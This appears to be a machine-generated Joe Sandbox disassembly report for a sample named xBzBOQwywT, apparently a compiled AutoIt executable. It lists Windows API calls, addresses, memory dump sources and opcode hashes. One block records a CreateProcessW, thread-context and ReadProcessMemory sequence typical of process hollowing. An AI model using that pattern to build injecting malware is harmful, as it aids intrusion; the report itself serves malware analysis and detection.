                                                                        • Instruction Fuzzy Hash: 66E17F75600209AFCB04DF98C880EAEB7B9FF88714F10859AE909DB351D775EE45CBA0
                                                                        APIs
                                                                        • VariantInit.OLEAUT32(?), ref: 0047950F
                                                                        • SysAllocString.OLEAUT32(00000000), ref: 004795D8
                                                                        • VariantCopy.OLEAUT32(?,?), ref: 0047960F
                                                                        • VariantClear.OLEAUT32(?), ref: 00479650
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: Variant$AllocClearCopyInitString
                                                                        • String ID:
                                                                        • API String ID: 2808897238-0
                                                                        • Opcode ID: d4078b498bd58c38c4ff211c6799319bb2158b2b01decc8b4cd966ad5c1122ff
                                                                        • Instruction ID: 372c40b5ecffa4d340e825e49f449287305c7189bb1404562c27c74c4f1437f4
                                                                        • Opcode Fuzzy Hash: d4078b498bd58c38c4ff211c6799319bb2158b2b01decc8b4cd966ad5c1122ff
                                                                        • Instruction Fuzzy Hash: 8251C436600209A6C700FF3AD8815DAB764EF84315F50863FFD0897252DB78DA1997EA
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: _memmove
                                                                        • String ID: Error:
                                                                        • API String ID: 4104443479-232661952
                                                                        • Opcode ID: 0f3a33fb7be69c8e6baf3b23b87111ea2728d16161c2c78c6bada8bccab6f67e
                                                                        • Instruction ID: 2c658176ab693071ca67d4d31bd2fe4acf4d59654e7b744331f3a235cb1e2e29
                                                                        • Opcode Fuzzy Hash: 0f3a33fb7be69c8e6baf3b23b87111ea2728d16161c2c78c6bada8bccab6f67e
                                                                        • Instruction Fuzzy Hash: 0D3191716006059FC324DF29C881AA7B3E6EF84314B24853FE95AC7791EB79E941CBD8
                                                                        APIs
                                                                        • GetOpenFileNameW.COMDLG32(?), ref: 0042961B
                                                                          • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,004A7F6C,0040F545,004A7F6C,004A90E8,004A7F6C,?,0040F545), ref: 0041013C
                                                                          • Part of subcall function 004102B0: SHGetMalloc.SHELL32(0040F54C), ref: 004102BD
                                                                          • Part of subcall function 004102B0: SHGetDesktopFolder.SHELL32(?,004A90E8), ref: 004102D2
                                                                          • Part of subcall function 004102B0: _wcsncpy.LIBCMT ref: 004102ED
                                                                          • Part of subcall function 004102B0: SHGetPathFromIDListW.SHELL32(?,?), ref: 00410327
                                                                          • Part of subcall function 004102B0: _wcsncpy.LIBCMT ref: 00410340
                                                                          • Part of subcall function 00410190: GetFullPathNameW.KERNEL32(?,00000104,?,?,?), ref: 004101AB
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: NamePath$Full_wcsncpy$DesktopFileFolderFromListMallocOpen
                                                                        • String ID: X$pWH
                                                                        • API String ID: 85490731-941433119
                                                                        • Opcode ID: 1b62eedeb2ba23f3a12794f4d72c3fd3ac9c0abd578206ca8986e50026ca9cbc
                                                                        • Instruction ID: b6f0e4d7e30e2857a1e9cc165fafff24640ac0dd2e9829c062eaf90218724cbe
                                                                        • Opcode Fuzzy Hash: 1b62eedeb2ba23f3a12794f4d72c3fd3ac9c0abd578206ca8986e50026ca9cbc
                                                                        • Instruction Fuzzy Hash: 1F118AB0A00244ABDB11EFD9DC457DEBBF95F45304F14842AE504AB392D7FD08498BA9
                                                                        APIs
                                                                        • _wcslen.LIBCMT ref: 00401B11
                                                                          • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                        • _memmove.LIBCMT ref: 00401B57
                                                                          • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                                                          • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                                                          • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: std::exception::exception$Exception@8Throw_malloc_memmove_wcslen
                                                                        • String ID: @EXITCODE
                                                                        • API String ID: 2734553683-3436989551
                                                                        APIs
                                                                        Similarity
                                                                        • API ID: __filbuf__getptd_noexit__read_memcpy_s
                                                                        • String ID:
                                                                        • API String ID: 1794320848-0
                                                                        APIs
                                                                        • Shell_NotifyIconW.SHELL32(00000000,?), ref: 0040E1A7
                                                                        Similarity
                                                                        • API ID: IconNotifyShell_
                                                                        • String ID:
                                                                        • API String ID: 1144537725-0
                                                                        APIs
                                                                        • _malloc.LIBCMT ref: 0043214B
                                                                          • Part of subcall function 004135BB: __FF_MSGBANNER.LIBCMT ref: 004135D4
                                                                          • Part of subcall function 004135BB: __NMSG_WRITE.LIBCMT ref: 004135DB
                                                                          • Part of subcall function 004135BB: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,004115F6,?,00401BAC,?,?,?), ref: 00413600
                                                                        • _malloc.LIBCMT ref: 0043215D
                                                                        • _malloc.LIBCMT ref: 0043216F
                                                                        Similarity
                                                                        • API ID: _malloc$AllocateHeap
                                                                        • String ID:
                                                                        • API String ID: 680241177-0
                                                                        APIs
                                                                        • TranslateMessage.USER32(?), ref: 00409556
                                                                        • DispatchMessageW.USER32(?), ref: 00409561
                                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409574
                                                                        Similarity
                                                                        • API ID: Message$DispatchPeekTranslate
                                                                        • String ID:
                                                                        • API String ID: 4217535847-0
                                                                        APIs
                                                                          • Part of subcall function 0040F760: _strcat.LIBCMT ref: 0040F786
                                                                        • _free.LIBCMT ref: 004295A0
                                                                          • Part of subcall function 004033C0: GetCurrentDirectoryW.KERNEL32(00000104,?,?), ref: 00403451
                                                                          • Part of subcall function 004033C0: GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00403467
                                                                          • Part of subcall function 004033C0: __wsplitpath.LIBCMT ref: 00403492
                                                                          • Part of subcall function 004033C0: _wcscpy.LIBCMT ref: 004034A7
                                                                          • Part of subcall function 004033C0: _wcscat.LIBCMT ref: 004034BC
                                                                          • Part of subcall function 004033C0: SetCurrentDirectoryW.KERNEL32(?), ref: 004034CC
                                                                        Strings
                                                                        Similarity
                                                                        • API ID: CurrentDirectory$FullNamePath__wsplitpath_free_strcat_wcscat_wcscpy
                                                                        • String ID: >>>AUTOIT SCRIPT<<<
                                                                        • API String ID: 3938964917-2806939583
                                                                        Strings
                                                                        • >>>AUTOIT NO CMDEXECUTE<<<, xrefs: 0042804F
                                                                        Similarity
                                                                        • API ID: _strcat
                                                                        • String ID: >>>AUTOIT NO CMDEXECUTE<<<
                                                                        • API String ID: 1765576173-2684727018
                                                                        APIs
                                                                        Similarity
                                                                        • API ID: ClearVariant
                                                                        • String ID:
                                                                        • API String ID: 1473721057-0
                                                                        APIs
                                                                        Similarity
                                                                        • API ID: _memmove
                                                                        • String ID:
                                                                        • API String ID: 4104443479-0
                                                                        APIs
                                                                          • Part of subcall function 0040F6F0: _wcslen.LIBCMT ref: 0040F705
                                                                          • Part of subcall function 0040F6F0: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,?,00454478,?,00000000,?,?), ref: 0040F71E
                                                                          • Part of subcall function 0040F6F0: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,?,00000000,?,?,?,?), ref: 0040F747
                                                                        • _strcat.LIBCMT ref: 0040F786
                                                                          • Part of subcall function 0040F850: _strlen.LIBCMT ref: 0040F858
                                                                          • Part of subcall function 0040F850: _sprintf.LIBCMT ref: 0040F9AE
                                                                        Similarity
                                                                        • API ID: ByteCharMultiWide$_sprintf_strcat_strlen_wcslen
                                                                        • String ID:
                                                                        • API String ID: 3199840319-0
                                                                        APIs
                                                                          • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                                                                        • __lock_file.LIBCMT ref: 00414A8D
                                                                          • Part of subcall function 00415471: __lock.LIBCMT ref: 00415496
                                                                        • __fclose_nolock.LIBCMT ref: 00414A98
                                                                        Similarity
                                                                        • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                                        • String ID:
                                                                        • API String ID: 2800547568-0
                                                                        • Opcode ID: a5ee4eb6f63f5c531cf15d6f0d52328148e0080a1a420ce895dcb566fcff73ac
                                                                        • Instruction ID: d9443fdd3ee0a3059f5d17ec53abbfe2105cc8a5d10ddad395bff0ae1f283336
                                                                        • Opcode Fuzzy Hash: a5ee4eb6f63f5c531cf15d6f0d52328148e0080a1a420ce895dcb566fcff73ac
                                                                        • Instruction Fuzzy Hash: EEF0F6308417019AD710AB7588027EF37A09F41379F22864FA061961D1C73C85C29B5D
                                                                        APIs
                                                                        • __lock_file.LIBCMT ref: 00415012
                                                                        • __ftell_nolock.LIBCMT ref: 0041501F
                                                                          • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: __ftell_nolock__getptd_noexit__lock_file
                                                                        • String ID:
                                                                        • API String ID: 2999321469-0
                                                                        • Opcode ID: 5d7fd30e9bb4e6974f03027405c635b91b5e55acacb14f372dcacdb3af77c648
                                                                        • Instruction ID: e3e7bc223609ce985a1750c66bb322057640979a4505571362f253753ce4bf01
                                                                        • Opcode Fuzzy Hash: 5d7fd30e9bb4e6974f03027405c635b91b5e55acacb14f372dcacdb3af77c648
                                                                        • Instruction Fuzzy Hash: 64F03030900605EADB107FB5DD027EE3B70AF443A8F20825BB0259A0E1DB7C8AC29A59
                                                                        APIs
                                                                        • CreateProcessW.KERNELBASE(?,00000000), ref: 03EBFECB
                                                                        • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 03EBFF61
                                                                        • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 03EBFF83
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1595095018.0000000003EBE000.00000040.00000020.00020000.00000000.sdmp, Offset: 03EBE000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_3ebe000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                        • String ID:
                                                                        • API String ID: 2438371351-0
                                                                        • Opcode ID: 6ff7500a3617197a005732162d507dd4d37460c8dcbf147a4ae2be43d63b6423
                                                                        • Instruction ID: 33a2a2837f98c9019b4080ce1f9fd38daae99267d4ca5a07f9d606ebb6867ee6
                                                                        • Opcode Fuzzy Hash: 6ff7500a3617197a005732162d507dd4d37460c8dcbf147a4ae2be43d63b6423
                                                                        • Instruction Fuzzy Hash: D412CF24A24658C6EB24DF64D8507DEB232EF68300F1061E9D10DEB7A5E77A4E81CF5A
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: _memmove
                                                                        • String ID:
                                                                        • API String ID: 4104443479-0
                                                                        • Opcode ID: 2ec043aaf64e314fdfe098a877e83977fff65afecd88cb3d034e09a745a7999d
                                                                        • Instruction ID: 6397ebbfaf442e519c955e074037b65107783079284990db5ef0c3dd021860ed
                                                                        • Opcode Fuzzy Hash: 2ec043aaf64e314fdfe098a877e83977fff65afecd88cb3d034e09a745a7999d
                                                                        • Instruction Fuzzy Hash: 36317371E00209EBDF009F52E9866AEFBF4FF40740F2189BED855E2650E7389990D759
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: ProtectVirtual
                                                                        • String ID:
                                                                        • API String ID: 544645111-0
                                                                        • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                        • Instruction ID: 21b87f0337b3904faf2e49e7d89a80b8c5538d611ad57d97d778efbd48141229
                                                                        • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                        • Instruction Fuzzy Hash: 8131F770A00105DBC718DF88E590AAAF7B1FB49310B6486A6E409CF355DB78EDC1CBD9
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: e5559574dc10eca8e97d8025a500eef8ee7d185e3c773571fee143e03780f234
                                                                        • Instruction ID: 427b4a632c312742ac0951887501238d3178a51c37fde1d0fd35c98815df3d2a
                                                                        • Opcode Fuzzy Hash: e5559574dc10eca8e97d8025a500eef8ee7d185e3c773571fee143e03780f234
                                                                        • Instruction Fuzzy Hash: 21119674200201ABDB249F36D984E26B3A5AF45304B244D2FF9C5D7790DB7CE881DB5E
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: __lock_file
                                                                        • String ID:
                                                                        • API String ID: 3031932315-0
                                                                        • Opcode ID: 9d46abaf5bc0bef18357e8259ddf310e5220bee08d011669e2131a09b3543261
                                                                        • Instruction ID: 324047821ed349453e17c5e7f52af34d31ade4ebcb64e32b23ce3c6ad3b356a0
                                                                        • Opcode Fuzzy Hash: 9d46abaf5bc0bef18357e8259ddf310e5220bee08d011669e2131a09b3543261
                                                                        • Instruction Fuzzy Hash: FF011E71801219EBCF21AFA5C8028DF7B71AF44764F11851BF824551A1E7398AE2DBD9
                                                                        APIs
                                                                          • Part of subcall function 00479500: VariantInit.OLEAUT32(?), ref: 0047950F
                                                                          • Part of subcall function 00437063: VariantClear.OLEAUT32(00479459), ref: 0043706B
                                                                          • Part of subcall function 00437063: VariantCopy.OLEAUT32(00479459,00470E7C), ref: 00437076
                                                                        • VariantClear.OLEAUT32(?), ref: 0047973E
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: Variant$Clear$CopyInit
                                                                        • String ID:
                                                                        • API String ID: 24293632-0
                                                                        • Opcode ID: 5d7337fccf444792d50b64af1a389de1ebb3e8953e67bf22bf250c0f7ac223aa
                                                                        • Instruction ID: ce75823fad5ab463881ca656a32c684f825172ff923cb7d6b6c05433a05b9d1b
                                                                        • Opcode Fuzzy Hash: 5d7337fccf444792d50b64af1a389de1ebb3e8953e67bf22bf250c0f7ac223aa
                                                                        • Instruction Fuzzy Hash: C4E012B251010C6B8704FBFDDDC6CAFB7BCFB18204B80495DB919A3142EA75A914C7E9
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: __wfsopen
                                                                        • String ID:
                                                                        • API String ID: 197181222-0
                                                                        • Opcode ID: b5c1dd7f54315c70b952dff0fe33ec93e52da603c388fdf08d18a597afa050f6
                                                                        • Instruction ID: b34ddb7a850719c89311ce964fc9f65e9e9400c6a390d5c1cbb008c3125e494a
                                                                        • Opcode Fuzzy Hash: b5c1dd7f54315c70b952dff0fe33ec93e52da603c388fdf08d18a597afa050f6
                                                                        • Instruction Fuzzy Hash: 82C092B244020C77CF112A93EC02F9A3F1E9BC0764F058021FB1C1A162AA77EAA19689
                                                                        APIs
                                                                        • Sleep.KERNELBASE(000001F4), ref: 03EC0721
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1595095018.0000000003EBE000.00000040.00000020.00020000.00000000.sdmp, Offset: 03EBE000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_3ebe000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: Sleep
                                                                        • String ID:
                                                                        • API String ID: 3472027048-0
                                                                        • Opcode ID: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                                                        • Instruction ID: a6e985a623d6d0a92be0d14de5c354839b4426cc6275f0afeeccf99b5794a27f
                                                                        • Opcode Fuzzy Hash: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                                                        • Instruction Fuzzy Hash: 4EE0BF7498010DEFDB00EFA8D6496DE7BB4EF04301F1006A5FD05D7681DB309E64CA62
                                                                        APIs
                                                                        • Sleep.KERNELBASE(000001F4), ref: 03EC0721
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1595095018.0000000003EBE000.00000040.00000020.00020000.00000000.sdmp, Offset: 03EBE000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_3ebe000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: Sleep
                                                                        • String ID:
                                                                        • API String ID: 3472027048-0
                                                                        • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                        • Instruction ID: 6815d5a47b2b62e0015fb93a8f5cca84acd55d46073e908bb57010eaf2134101
                                                                        • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                        • Instruction Fuzzy Hash: 59E0E67498010DDFDB00EFB8D64969E7FB4EF04301F1002A5FD01D2281D6309D60CA62
                                                                        APIs
                                                                        • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0047C8E1
                                                                        • DefDlgProcW.USER32(?,0000004E,?,?), ref: 0047C8FC
                                                                        • GetKeyState.USER32(00000011), ref: 0047C92D
                                                                        • GetKeyState.USER32(00000009), ref: 0047C936
                                                                        • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0047C949
                                                                        • GetKeyState.USER32(00000010), ref: 0047C953
                                                                        • GetWindowLongW.USER32(00000002,000000F0), ref: 0047C967
                                                                        • SendMessageW.USER32(00000002,0000110A,00000009,00000000), ref: 0047C993
                                                                        • SendMessageW.USER32(00000002,0000113E,00000000,?), ref: 0047C9B6
                                                                        • _wcsncpy.LIBCMT ref: 0047CA29
                                                                        • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0047CA5A
                                                                        • SendMessageW.USER32 ref: 0047CA7F
                                                                        • InvalidateRect.USER32(?,00000000,00000001), ref: 0047CADF
                                                                        • SendMessageW.USER32(?,00001030,?,0047EA68), ref: 0047CB84
                                                                        • ImageList_SetDragCursorImage.COMCTL32(00AB14B8,00000000,00000000,00000000), ref: 0047CB9B
                                                                        • ImageList_BeginDrag.COMCTL32(00AB14B8,00000000,000000F8,000000F0), ref: 0047CBAC
                                                                        • SetCapture.USER32(?), ref: 0047CBB6
                                                                        • ClientToScreen.USER32(?,?), ref: 0047CC17
                                                                        • ImageList_DragEnter.COMCTL32(00000000,?,?,?,?), ref: 0047CC26
                                                                        • ReleaseCapture.USER32 ref: 0047CC3A
                                                                        • GetCursorPos.USER32(?), ref: 0047CC72
                                                                        • ScreenToClient.USER32(?,?), ref: 0047CC80
                                                                        • SendMessageW.USER32(?,00001012,00000000,?), ref: 0047CCE6
                                                                        • SendMessageW.USER32 ref: 0047CD12
                                                                        • SendMessageW.USER32(?,00001111,00000000,?), ref: 0047CD53
                                                                        • SendMessageW.USER32 ref: 0047CD80
